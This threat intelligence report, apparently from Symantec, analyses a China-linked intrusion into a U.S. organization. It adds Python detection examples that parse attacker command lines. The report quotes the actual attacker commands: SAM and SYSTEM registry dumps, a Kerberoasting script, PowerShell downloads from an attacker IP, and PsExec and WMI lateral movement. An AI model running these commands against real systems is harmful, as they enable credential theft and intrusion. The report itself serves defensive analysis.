
U.S. Organization in China Targeted by Attackers

A large U.S. organization was the subject of a four-month-long intrusion by China-based attackers.

A large U.S. organization with a significant presence in China was the subject of a targeted attack earlier this year, during which the attackers obtained a persistent presence on its network, seemingly for the purpose of intelligence gathering. The attack was likely carried out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers. 

While it is possible that the actual network intrusion occurred earlier, the first evidence of the attackers’ activity dates from April 2024, and the malicious activity continued until August 2024. The attackers moved laterally across the organization’s network, compromising multiple computers. Some of the machines targeted were Exchange Servers, suggesting the attackers were gathering intelligence by harvesting emails. Exfiltration tools were also deployed, suggesting that targeted data was taken from the organization. 

Tools and tactics

DLL sideloading: The attackers used several legitimate applications to load malware, a technique known as DLL sideloading, in which the attackers abuse the Windows DLL search order by planting a legitimate application alongside a malicious DLL, so that invoking the application loads and executes the malicious payload. In this case, several Google and Apple applications were used to perform sideloading (GoogleToolbarNotifier.exe and iTunesHelper.exe).

Impacket: An open-source collection of modules written in Python, a general purpose programming language, for programmatically constructing and manipulating network protocols. It contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.

FileZilla: An open-source FTP client and server available for Windows, Linux, and macOS. 

PSCP: A Secure Copy Protocol (SCP) client created by the same developers as the PuTTY SSH client.

Living off the land: The attackers also leveraged several living-off-the-land tools, including:

  • WMI (Windows Management Instrumentation): Microsoft management infrastructure, with a command-line interface, that can be used to execute commands on remote computers.
  • PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool is primarily used by attackers to move laterally on victim networks.
  • PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.

Attack timeline – Machine 1

The initial infection vector remains unknown. However, the first evidence of malicious activity dates from April 11, 2024, when a suspicious command was executed on one computer via WMI, which bore the hallmarks of a tool leveraging Impacket from another machine on the network:
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1

cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1

The fact that the command originated from another machine on the network suggests that the attackers had already compromised at least one other machine on the organization’s network and that the intrusion may have begun prior to April 11.
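An added example (not code from the original report) of how a defender can triage process-creation command lines for this Impacket artifact. The `__<number>` suffix on the ADMIN$ output file is the Unix time on the operator's machine when the command was issued, so decoding it confirms the timeline; the sample lines are constructed from the commands quoted in this report.

```python
import re
from datetime import datetime, timezone

# Impacket's wmiexec runs each command through "cmd.exe /Q /c ..." and
# redirects output to a file on the ADMIN$ share named "__<unix time>",
# which it then reads back over SMB. The regex matches that exact shape.
WMIEXEC_RE = re.compile(
    r"cmd\.exe\s+/Q\s+/c\s+(?P<cmd>.+?)\s+1>\s*"
    r"\\\\127\.0\.0\.1\\ADMIN\$\\__(?P<ts>\d{10}(?:\.\d+)?)\s+2>&1",
    re.IGNORECASE,
)

def parse_wmiexec(cmdline):
    """Return (inner command, UTC time it was issued) or None if not a wmiexec line."""
    m = WMIEXEC_RE.search(cmdline)
    if not m:
        return None
    issued = datetime.fromtimestamp(float(m.group("ts")), tz=timezone.utc)
    return m.group("cmd"), issued

def triage(lines):
    """One finding per matching line, ready to compare against the host's own clock."""
    findings = []
    for line in lines:
        hit = parse_wmiexec(line)
        if hit:
            cmd, issued = hit
            findings.append({"issued_utc": issued.strftime("%Y-%m-%d %H:%M:%S"), "cmd": cmd})
    return findings

# Constructed sample lines modelled on the commands quoted in this report.
SAMPLE_LOG = [
    r"cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1",
    r"cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1717319212.299007 2>&1",
    r'cmd.exe /Q /c powershell echo ((new-object Net.Sockets.TcpClient).Connect(\"192.168.92.92\",135)) "open!" 1> \\127.0.0.1\ADMIN$\__1717327352.4534295 2>&1',
    r"cmd.exe /c whoami",  # ordinary command, should not match
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["issued_utc"], f["cmd"])
```

A decoded time that disagrees badly with the host's event timestamp points at a tool running on a machine with a different clock, which is itself worth noting in the timeline.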

The attackers then attempted to mount a network share using the “net use” command. Next, they dumped credentials from the registry using reg.exe: 

reg save hklm\system ss

reg save hklm\sam sa

A minute later, they attempted to mount another network share, using the “net use” command, specifically attempting to mount a drive connected to a network attached storage (NAS) device.

A few hours later, the attackers returned and ran netstat to check for all open TCP (active and listening) connections. 

The attackers then executed another encoded PowerShell script, which decoded as:

$ProgressPreference="SilentlyContinue";setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

The command queries Active Directory (AD) for service principal names (SPNs), which identify accounts associated with services within the AD. It then parses the output for each matching SPN and requests a Kerberos service ticket (security token) for it. 

This tactic is known as Kerberoasting. It is used to steal credentials specifically for service accounts; the attackers likely attempt to crack the tickets offline in an effort to gain access to privileged accounts that assist in moving laterally across the network.

It is also worth noting that the domain specified in the above command, “medin.local”, is the default domain name used in a number of publicly available Kerberoast tools and scripts, suggesting the attackers were directly leveraging off-the-shelf tooling without any modifications.

The attackers were then observed modifying some of the commands and executing several further PowerShell commands, this time with the correct domain:

$ProgressPreference="SilentlyContinue";setspn -T [REMOVED] -Q */*

$ProgressPreference="SilentlyContinue";klist

$ProgressPreference="SilentlyContinue";klist tgt

The “klist” command lists the current Kerberos tickets for the user, giving visibility into the user's active Kerberos authentication status. Additionally, “tgt” refers to the Ticket Granting Ticket, which is a special type of ticket used to authenticate to the Key Distribution Center (KDC). This is likely targeted by the attackers to obtain other service tickets to attempt to crack offline.
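An added example (not from the original report) that decodes a `-EncodedCommand` PowerShell line (UTF-16LE base64) and checks the result for the Kerberoasting indicators quoted above: the `setspn -Q */*` sweep, the `KerberosRequestorSecurityToken` ticket request, the leftover `medin.local` default domain, and `klist tgt`. The sample command line is constructed here by encoding the decoded script the report quotes.

```python
import base64
import re

# Indicators drawn from the Kerberoasting commands quoted in this report.
KERBEROAST_RULES = [
    (r"setspn(?:\.exe)?\s+-T\s+\S+\s+-Q\s+\*/\*", "SPN enumeration across every service account"),
    (r"KerberosRequestorSecurityToken", "service ticket requested from PowerShell"),
    (r"\bmedin\.local\b", "default domain left over from public Kerberoast scripts"),
    (r"\bklist(?:\.exe)?\s+tgt\b", "TGT inspection with klist"),
]

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (UTF-16LE base64); otherwise the line itself."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not really an encoded command; scan the raw line instead

def kerberoast_findings(cmdline):
    """Descriptions of every rule that fires on the decoded command line."""
    script = decode_encoded_command(cmdline)
    return [desc for pat, desc in KERBEROAST_RULES if re.search(pat, script, re.IGNORECASE)]

def encode_for_powershell(script):
    """Build the form PowerShell expects for -EncodedCommand (used only for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: the decoded script quoted in this report, wrapped as an encoded command.
SAMPLE_SCRIPT = ('$ProgressPreference="SilentlyContinue";setspn.exe -T medin.local -Q */* | '
                 "Select-String '^CN' -Context 0,1 | % { New-Object "
                 "System.IdentityModel.Tokens.KerberosRequestorSecurityToken "
                 "-ArgumentList $_.Context.PostContext[0].Trim() }")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for finding in kerberoast_findings(SAMPLE_CMDLINE):
        print("-", finding)
```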

On April 16, malicious activity resumed on the same computer when the attackers launched a command prompt via WMI.

The next day, they proceeded to execute a file named rc.exe, which is a renamed version of Google’s application GoogleToolbarNotifier. This file was used to sideload a malicious DLL named gtn.dll.

Attack timeline – Machine 2

Malicious activity began on a second machine, a web server, on June 2, 2024. The attackers again used the change directory command via WMI, with the structure of the command suggesting that Impacket was used:

cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1717319212.299007 2>&1

Minutes later, the attackers ran a file named putty.exe. Despite the name, the application is actually the SFTP component of FileZilla, which is based on PuTTY’s Secure File Transfer Protocol (SFTP) client. This was likely installed for data exfiltration purposes. 

On June 13, the same file was executed multiple times via WMI. 

The next day (June 14), PowerShell was used to download files from a remote host to the perflogs directory: 

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/rar.exe','CSIDL_SYSTEM_DRIVE\perflogs\rar.exe')

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/vmtools.exe','CSIDL_SYSTEM_DRIVE\perflogs\vmtools.exe')

Although not recovered, rar.exe was likely the command-line version of WinRAR. The file named vmtools.exe was a renamed version of PSCP, the Secure Copy Protocol (SCP) client created by the same developers as PuTTY SSH.

Malicious activity on this computer resumed on June 27, when a number of commands were executed, mostly via PsExec. Among the files run was the legitimate Google application GoogleUpdate.exe. Among the suspicious files found on this machine were two named libnettle-6.dll and textinputhost.dat. It is possible that one or both were malicious files that were sideloaded. Textinputhost.dat was previously reported by Sophos and Recorded Future as being used by the Chinese Crimson Palace group in attacks against targets in Southeast Asia. 

Attack timeline – Machine 3

Malicious activity began on a third machine on June 2, when WMI was used to execute wevtutil to query the Windows Event Log from a remote machine on the network:

wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4624) or (EventID=4672) or (EventID=4634) or (EventID=4673) or (EventID=4740)]] and *[System[TimeCreated[timediff(@SystemTime)<=2592000000]]]"

The command was structured to query the security event log for the following events:

  • EventID=4624: A successful logon event.
  • EventID=4672: Special privileges assigned to a new logon.
  • EventID=4634: Logoff event.
  • EventID=4673: Indicates that a privileged service was called.
  • EventID=4740: An account was locked out.
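An added example (not from the original report) that breaks a `wevtutil qe` command like the one above into what it actually asks for: the channel, the event IDs with the meanings listed here, and the lookback window, which XPath expresses in milliseconds. The `looks_like_logon_recon` threshold is our own heuristic, not something the report states.

```python
import re

# Security-log event IDs named in the wevtutil query quoted in this report.
EVENT_NAMES = {
    4624: "successful logon",
    4672: "special privileges assigned to new logon",
    4634: "logoff",
    4673: "privileged service called",
    4740: "account locked out",
}
MS_PER_DAY = 86_400_000  # timediff(@SystemTime) in event-log XPath filters is in milliseconds

def parse_wevtutil_query(cmdline):
    """Break a 'wevtutil qe <channel> ... /q:<xpath>' command into its components."""
    m = re.search(r"wevtutil(?:\.exe)?\s+qe\s+(\S+)(.*)", cmdline, re.IGNORECASE | re.DOTALL)
    if not m:
        return None
    channel, rest = m.group(1), m.group(2)
    event_ids = sorted({int(x) for x in re.findall(r"EventID\s*=\s*(\d+)", rest)})
    win = re.search(r"timediff\(@SystemTime\)\s*<=\s*(\d+)", rest)
    return {
        "channel": channel,
        "event_ids": event_ids,
        "names": [EVENT_NAMES.get(e, "unknown") for e in event_ids],
        "lookback_days": int(win.group(1)) / MS_PER_DAY if win else None,
        "newest_first": bool(re.search(r"/rd:true", rest, re.IGNORECASE)),  # /rd reverses order
    }

def looks_like_logon_recon(parsed, min_days=7):
    """Heuristic (our own threshold): two or more logon-related events pulled over a
    week or more of history reads as reconnaissance rather than troubleshooting."""
    logon_ids = {4624, 4634, 4672, 4673}
    return (parsed is not None
            and len(logon_ids & set(parsed["event_ids"])) >= 2
            and (parsed["lookback_days"] or 0) >= min_days)

# Constructed sample: the query quoted in this report.
SAMPLE_QUERY = ('wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4624) or (EventID=4672) '
                'or (EventID=4634) or (EventID=4673) or (EventID=4740)]] and '
                '*[System[TimeCreated[timediff(@SystemTime)<=2592000000]]]"')

if __name__ == "__main__":
    parsed = parse_wevtutil_query(SAMPLE_QUERY)
    print(parsed, looks_like_logon_recon(parsed))
```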

Immediately afterwards, the attackers ran a PowerShell script via WMI:

cmd.exe /Q /c powershell echo ((new-object Net.Sockets.TcpClient).Connect(\"192.168.92.92\",135)) "open!" 1> \\127.0.0.1\ADMIN$\__1717327352.4534295 2>&1

The attackers likely used this script to test connectivity back to another computer on the network, specifically to confirm whether Microsoft’s remote procedure call (RPC) service was reachable (port 135). The attackers also attempted to connect to the same machine on port 3389 (usually reserved for RDP):

powershell echo ((new-object Net.Sockets.TcpClient).Connect(\"192.168.92.92\",3389)) "open!"

The attackers returned on June 20 and launched a command prompt via PsExec from another machine on the network (192.168.88.235). Several net commands were then executed:

CSIDL_SYSTEM\net1 group "Exchange Servers" /domain

The commands are used to display information pertaining to specific groups of the domain. One group the attackers were particularly interested in is "Exchange Servers", suggesting the attackers were attempting to target mail servers to collect and possibly exfiltrate email data. 

Later in the same day, a suspicious PowerShell command was executed via PsExec:

powershell -exec bypass -command "Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate|Format-Table -AutoSize |Out-File -FilePath CSIDL_COMMON_APPDATA\computer.txt -Width ([int]::MaxValue)"

The command retrieves all enabled computers from Active Directory along with their name, DNS hostname, operating system, and last logon date. It then formats the information into a table and saves it to a file called computer.txt. Minutes later, the quser command was executed to list all logged-in/active user sessions on the machine.

The next day (June 21), the machine was used again to launch a command prompt on another machine on the network:

PsExec64.exe \\192.168.92.79 -accepteula cmd

Attack timeline – Machine 4

On June 5, a suspicious command was executed on a fourth computer via WMI: 

reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs" CSIDL_WINDOWS\temp\ts_2011.tmp 

The command exports registry key values to a .TMP file. The registry key Control\Session Manager\KnownDLLs holds a list of trusted DLLs that the system typically loads from the System32 directory during system boot-up that may be leveraged by other processes. Exporting this key will copy all the registry values associated with these KnownDLLs and may provide information to the attackers on what file names may appear innocuous if reused or, more likely, for the purposes of DLL hijacking. This is a common attack where malicious DLLs are placed in directories to be loaded instead of legitimate system DLLs.

Attack timeline – Machine 5

On June 13, activity commenced on a fifth machine when a command was executed via WMI to change the directory to the root drive. The attackers then attempted to launch the application iTunesHelper.exe from the PerfLogs directory. This was likely launched to load a malicious DLL (CoreFoundation.dll) using the sideloading technique (we have seen this done many times before with this same binary using CoreFoundation.dll).
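An added example (not from the original report) of a detection for the sideloading pattern seen on Machines 1, 2 and 5: a known host executable (matched by its OriginalFileName, so renaming to rc.exe does not hide it) running from a directory such as PerfLogs and loading a DLL from its own directory that the vendor did not sign. The host list, expected signer names and the Sysmon-shaped events are all constructed for this example.

```python
from pathlib import PureWindowsPath

# Legitimate executables this report saw abused as sideloading hosts, keyed by the
# OriginalFileName in their version resource. The signer names are our assumption
# of the vendor expected on any DLL those hosts load from their own directory.
SIDELOAD_HOSTS = {
    "googletoolbarnotifier.exe": "Google LLC",
    "googleupdate.exe": "Google LLC",
    "ituneshelper.exe": "Apple Inc.",
}
TRUSTED_DIRS = ("c:\\program files", "c:\\program files (x86)")

def sideload_findings(proc_events, load_events):
    """Map each watched host process to the reasons it looks like a sideload victim."""
    hosts = {}
    for ev in proc_events:
        signer = SIDELOAD_HOSTS.get(ev["original_file_name"].lower())
        if signer:
            hosts[ev["pid"]] = (ev, signer, [])
    for ev, _, reasons in hosts.values():
        image = PureWindowsPath(ev["image"])
        if image.name.lower() != ev["original_file_name"].lower():
            reasons.append(f"renamed host: {image.name} is really {ev['original_file_name']}")
        if not str(image.parent).lower().startswith(TRUSTED_DIRS):
            reasons.append(f"host running from {image.parent}")
    for ev in load_events:
        if ev["pid"] not in hosts:
            continue
        host, signer, reasons = hosts[ev["pid"]]
        dll = PureWindowsPath(ev["image_loaded"])
        # A DLL beside the host (the search-order hijack position) that the vendor did not sign
        if dll.parent == PureWindowsPath(host["image"]).parent and ev.get("signer") != signer:
            reasons.append(f"{dll.name} loaded from host directory, signer={ev.get('signer')}")
    return {host["image"]: reasons for host, _, reasons in hosts.values() if reasons}

# Constructed sample events shaped like Sysmon process-create and image-load records.
PROC_EVENTS = [
    {"pid": 4120, "image": r"C:\PerfLogs\rc.exe", "original_file_name": "GoogleToolbarNotifier.exe"},
    {"pid": 4388, "image": r"C:\PerfLogs\iTunesHelper.exe", "original_file_name": "iTunesHelper.exe"},
    {"pid": 5010, "image": r"C:\Program Files\iTunes\iTunesHelper.exe", "original_file_name": "iTunesHelper.exe"},
]
LOAD_EVENTS = [
    {"pid": 4120, "image_loaded": r"C:\PerfLogs\gtn.dll", "signer": None},
    {"pid": 4388, "image_loaded": r"C:\PerfLogs\CoreFoundation.dll", "signer": None},
    {"pid": 5010, "image_loaded": r"C:\Program Files\iTunes\CoreFoundation.dll", "signer": "Apple Inc."},
    {"pid": 5010, "image_loaded": r"C:\Windows\System32\kernel32.dll", "signer": "Microsoft Windows"},
]
```

The legitimately installed iTunesHelper.exe produces no finding, which is the point of keying on signer and directory rather than on file name alone.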

Links to known actors

The available evidence suggests that the organization was breached by a China-based actor. Aside from the fact that DLL sideloading is a widely favored tactic among Chinese groups, the same organization was targeted in 2023 by an attacker with tentative links to the China-based Daggerfly group. 

The file textinputhost.dat was previously reported by Sophos and Recorded Future as being leveraged by the China-based espionage group Crimson Palace in attacks against Southeast Asia. In that case, it was used in conjunction with an executable named rc.exe. The same file name was also used by the attackers who conducted this attack.

The behavioral security technologies in Symantec Endpoint Security provide our customers with protection from fileless, Living Off the Land, and behavior-based attacks, including atypical command-line activity and suspicious application behaviors such as non-process executables or DLL sideloading. Read more about those technologies here.

For the latest protection updates, please visit the Symantec Protection Bulletin

Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.


About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.
